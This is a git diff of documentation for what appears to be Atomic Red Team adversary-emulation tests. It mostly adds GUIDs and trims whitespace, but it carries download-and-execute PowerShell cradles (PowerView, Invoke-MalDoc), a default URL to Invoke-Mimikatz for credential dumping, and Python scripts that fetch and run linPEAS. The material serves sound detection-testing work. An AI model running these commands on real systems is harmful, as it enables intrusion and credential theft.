--- a/atomics/T1056.002/T1056.002.md
+++ b/atomics/T1056.002/T1056.002.md
@@ -20,6 +20,10 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15
+
+
+
 
 
 
@@ -46,6 +50,10 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52
+
+
+
 
 
 
diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md
index dfb41588..b3eab452 100644
--- a/atomics/T1056.004/T1056.004.md
+++ b/atomics/T1056.004/T1056.004.md
@@ -20,10 +20,14 @@ Hooks functions in PowerShell to read TLS Communications
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_name | Dll To Inject | Path | PathToAtomicsFolder&#92;T1056.004&#92;bin&#92;T1056.004x64.dll|
 | server_name | TLS Server To Test Get Request | Url | https://www.example.com|
@@ -44,7 +48,7 @@ curl #{server_name} -UseBasicParsing
 ##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
+if (Test-Path #{file_name}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index 0457a658..68e6c297 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -21,10 +21,14 @@ Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | path of output file | path | /tmp/loot.txt|
 
@@ -57,6 +61,10 @@ Upon successful execution, cmd.exe will execute tasklist.exe to list processes.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908
+
+
+
 
 
 
diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md
index 8345c90c..d86d109d 100644
--- a/atomics/T1059.001/T1059.001.md
+++ b/atomics/T1059.001/T1059.001.md
@@ -55,10 +55,14 @@ Download Mimikatz and dump credentials. Upon execution, mimikatz dump details an
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
 
@@ -86,10 +90,14 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_path | File path for SharpHound payload | String | PathToAtomicsFolder&#92;T1059.001&#92;src|
 
@@ -115,7 +123,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
 ##### Description: SharpHound.ps1 must be located at #{file_path}
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} 
+if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -136,6 +144,10 @@ Successful execution will produce stdout message stating "SharpHound Enumeration
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7
+
+
+
 
 
 
@@ -167,6 +179,10 @@ Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804
+
+
+
 
 
 
@@ -193,6 +209,10 @@ Run mimikatz via PsSendKeys. Upon execution, automated actions will take place t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d
+
+
+
 
 
 
@@ -219,6 +239,10 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372
+
+
+
 
 
 
@@ -245,10 +269,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1|
 
@@ -276,10 +304,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.xml|
 
@@ -307,10 +339,14 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct|
 
@@ -337,6 +373,10 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
+
+
+
 
 
 #### Run it with these steps! 
@@ -359,6 +399,10 @@ art-marker.txt is in the folder.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73
+
+
+
 
 
 
@@ -392,6 +436,10 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e
+
+
+
 
 
 
@@ -409,7 +457,7 @@ powershell.exe -version 2 -Command Write-Host $PSVersion
 ##### Description: PowerShell version 2 must be installed
 ##### Check Prereq Commands:
 ```powershell
-if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} 
+if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -428,10 +476,14 @@ Creates a file with an alternate data stream and simulates executing that hidden
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ads_file | File created to store Alternate Stream Data | String | $env:TEMP&#92;NTFS_ADS.txt|
 
@@ -456,7 +508,7 @@ Remove-Item #{ads_file} -Force -ErrorAction Ignore
 ##### Description: Homedrive must be an NTFS drive
 ##### Check Prereq Commands:
 ```powershell
-if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} 
+if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -476,10 +528,14 @@ Upon execution, network test info and 'T1086 PowerShell Session Creation and Use
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | hostname_to_connect | The host to connect to, by default it will connect to the local machine | String | $env:COMPUTERNAME|
 
@@ -508,7 +564,7 @@ Try {
 } 
 Catch {
     exit 1
-} 
+}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -527,10 +583,14 @@ Executes powershell.exe with variations of the -Command parameter
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -552,7 +612,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -571,10 +631,14 @@ Executes powershell.exe with variations of the -Command parameter with encoded a
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | command_param_variation | The "Command" parameter variation to use | String | C|
@@ -597,7 +661,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -616,10 +680,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 86a43bad-12e3-4e85-b97c-4d5cf25b95c3
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
@@ -641,7 +709,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -660,10 +728,14 @@ Executes powershell.exe with variations of the -EncodedCommand parameter with en
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0d181431-ddf3-4826-8055-2dbf63ae848b
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | encoded_command_param_variation | The "EncodedCommand" parameter variation to use | String | E|
 | command_line_switch_type | The type of supported command-line switch to use | String | Hyphen|
@@ -686,7 +758,7 @@ Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_swit
 ```powershell
 $RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable
 if (-not $RequiredModule) {exit 1}
-if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0} 
+if (-not $RequiredModule.ExportedCommands['Out-ATHPowerShellCommandLineParameter']) {exit 1} else {exit 0}
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1059.002/T1059.002.md b/atomics/T1059.002/T1059.002.md
index f748438d..404aff72 100644
--- a/atomics/T1059.002/T1059.002.md
+++ b/atomics/T1059.002/T1059.002.md
@@ -24,6 +24,10 @@ Reference: https://github.com/EmpireProject/Empire
 **Supported Platforms:** macOS
 
 
+**auto_generated_guid:** 3600d97d-81b9-4171-ab96-e4386506e2c2
+
+
+
 
 
 
diff --git a/atomics/T1059.003/T1059.003.md b/atomics/T1059.003/T1059.003.md
index a682a7b9..4a96ddef 100644
--- a/atomics/T1059.003/T1059.003.md
+++ b/atomics/T1059.003/T1059.003.md
@@ -21,10 +21,14 @@ Creates and executes a simple batch script. Upon execution, CMD will briefly lau
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 9e8894c0-50bd-4525-a96c-d4ac78ece388
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | command_to_execute | Command to execute within script. | string | dir|
 | script_path | Script path. | path | $env:TEMP&#92;T1059.003_script.bat|
@@ -48,7 +52,7 @@ Remove-Item #{script_path} -Force -ErrorAction Ignore
 ##### Description: Batch file must exist on disk at specified location (#{script_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{script_path}) {exit 0} else {exit 1} 
+if (Test-Path #{script_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -68,10 +72,14 @@ Writes text to a file and display the results. This test is intended to emulate
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 127b4afe-2346-4192-815c-69042bec570e
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | file_contents_path | Path to the file that the command prompt will drop. | path | %TEMP%&#92;test.bin|
 | message | Message that will be written to disk and then displayed. | string | Hello from the Windows Command Prompt!|
diff --git a/atomics/T1059.004/T1059.004.md b/atomics/T1059.004/T1059.004.md
index 1b5be0f8..c5280a49 100644
--- a/atomics/T1059.004/T1059.004.md
+++ b/atomics/T1059.004/T1059.004.md
@@ -21,10 +21,14 @@ Creates and executes a simple bash script.
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_path | Script path | path | /tmp/art.sh|
 
@@ -59,6 +63,10 @@ Upon successful execution, sh will download via curl and wget the specified payl
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
+
+
+
 
 
 
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index b4f09402..d81a0599 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -25,10 +25,14 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1620de42-160a-4fe5-bbaf-d3fef0181ce9
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | vbscript | Path to sample script | String | PathToAtomicsFolder&#92;T1059.005&#92;src&#92;sys_info.vbs|
 
@@ -52,7 +56,7 @@ Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
 ##### Description: Sample script must exist on disk at specified location (#{vbscript})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{vbscript}) {exit 0} else {exit 1} 
+if (Test-Path #{vbscript}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -77,6 +81,10 @@ You can validate this by opening WinWord -> File -> Account -> About Word
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+
+
+
 
 
 
@@ -84,7 +92,8 @@ You can validate this by opening WinWord -> File -> Account -> About Word
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
 ```
 
@@ -104,7 +113,7 @@ try {
   $path = $wdApp.Path
   Stop-Process -Name "winword"
   if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -125,10 +134,14 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 8faff437-a114-4547-9a60-749652a03df6
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | ms_product | Maldoc application Word | String | Word|
 
@@ -137,7 +150,8 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b
 
 
 ```powershell
-IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
 Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
 ```
 
@@ -157,7 +171,7 @@ try {
   $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
   Stop-Process -Name $process
   exit 0
-} catch { exit 1 } 
+} catch { exit 1 }
 ```
 ##### Get Prereq Commands:
 ```powershell
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index df243080..3425d472 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -54,7 +54,8 @@ atomic_tests:
       Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
     cleanup_command: |
       Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -88,8 +89,9 @@ atomic_tests:
       Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
   executor:
     command: |
-      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) 
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) 
       Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract"
     cleanup_command: |
       Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
-    name: powershell
\ No newline at end of file
+    name: powershell
diff --git a/atomics/T1059.006/T1059.006.md b/atomics/T1059.006/T1059.006.md
index 01f280d0..db4b1100 100644
--- a/atomics/T1059.006/T1059.006.md
+++ b/atomics/T1059.006/T1059.006.md
@@ -21,10 +21,14 @@ Download and execute shell script and write to file then execute locally using P
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
 | payload_file_name | Name of shell script downloaded from the script_url | String | T1059.006-payload|
@@ -51,7 +55,7 @@ rm #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -70,10 +74,14 @@ Create Python file (.py) that downloads and executes shell script via executor a
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Python script name | Path | T1059.006.py|
 | script_url | Shell script public URL | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -111,7 +119,7 @@ rm #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
@@ -130,10 +138,14 @@ Create Python file (.py) then compile to binary (.pyc) that downloads an externa
 **Supported Platforms:** Linux
 
 
+**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | python_script_name | Name of Python script name | Path | T1059.006.py|
 | script_url | URL hosting external malicious payload | String | https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh|
@@ -173,7 +185,7 @@ rm #{python_binary_name} #{python_script_name} #{payload_file_name}
 ##### Check Prereq Commands:
 ```sh
 which_python=`which python`; python -V
-$which_python -c 'import requests' 2>/dev/null; echo $? 
+$which_python -c 'import requests' 2>/dev/null; echo $?
 ```
 ##### Get Prereq Commands:
 ```sh
diff --git a/atomics/T1069.001/T1069.001.md b/atomics/T1069.001/T1069.001.md
index 55a48f28..56654c95 100644
--- a/atomics/T1069.001/T1069.001.md
+++ b/atomics/T1069.001/T1069.001.md
@@ -21,6 +21,10 @@ Permission Groups Discovery
 **Supported Platforms:** macOS, Linux
 
 
+**auto_generated_guid:** 952931a4-af0b-4335-bbbe-73c8c5b327ae
+
+
+
 
 
 
@@ -48,6 +52,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 1f454dd6-e134-44df-bebb-67de70fb6cd8
+
+
+
 
 
 
@@ -74,6 +82,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a580462d-2c19-4bc7-8b9a-57a41b7d3ba4
+
+
+
 
 
 
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 2eeb4a9f..2ea99ae1 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -32,6 +32,10 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** dd66d77d-8998-48c0-8024-df263dc2ce5d
+
+
+
 
 
 
@@ -60,10 +64,14 @@ information will be displayed.
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | user | User to identify what groups a user is a member of | string | administrator|
 
@@ -90,6 +98,10 @@ test will display some errors if run on a computer not connected to a domain. Up
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 0afb5163-8181-432e-9405-4322710c0c37
+
+
+
 
 
 
@@ -117,6 +129,10 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a2d71eee-a353-4232-9f86-54f4288dd8c1
+
+
+
 
 
 
@@ -124,6 +140,7 @@ Find machines where user has local admin access (PowerView). Upon execution, pro
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
 ```
 
@@ -141,6 +158,10 @@ Enumerates members of the local Administrators groups across all machines in the
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
+
+
+
 
 
 
@@ -148,6 +169,7 @@ Enumerates members of the local Administrators groups across all machines in the
 
 
 ```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
 ```
 
@@ -165,10 +187,14 @@ takes a computer and determines who has admin rights over it through GPO enumera
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 64fdb43b-5259-467a-b000-1b02c00e510a
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | computer_name | hostname of the computer to analyze | Path | $env:COMPUTERNAME|
 
@@ -177,7 +203,8 @@ takes a computer and determines who has admin rights over it through GPO enumera
 
 
 ```powershell
-IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
 ```
 
 
@@ -194,6 +221,10 @@ When successful, accounts that do not require kerberos pre-auth will be returned
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 870ba71e-6858-4f6d-895c-bb6237f6121b
+
+
+
 
 
 
@@ -211,7 +242,7 @@ get-aduser -f * -pr DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq
 ##### Description: Computer must be domain joined.
 ##### Check Prereq Commands:
 ```powershell
-if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1} 
+if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -220,7 +251,7 @@ Write-Host Joining this computer to a domain must be done manually.
 ##### Description: Requires the Active Directory module for powershell to be installed.
 ##### Check Prereq Commands:
 ```powershell
-if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1} 
+if(Get-Module -ListAvailable -Name ActiveDirectory) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
@@ -240,10 +271,14 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 **Supported Platforms:** Windows
 
 
+**auto_generated_guid:** 48ddc687-82af-40b7-8472-ff1e742e8274
+
+
+
 
 
 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | adfind_path | Path to the AdFind executable | Path | PathToAtomicsFolder&#92;T1087.002&#92;src&#92;AdFind.exe|
 
@@ -262,10 +297,11 @@ reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.c
 ##### Description: AdFind.exe must exist on disk at specified location (#{adfind_path})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{adfind_path}) {exit 0} else {exit 1} 
+if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
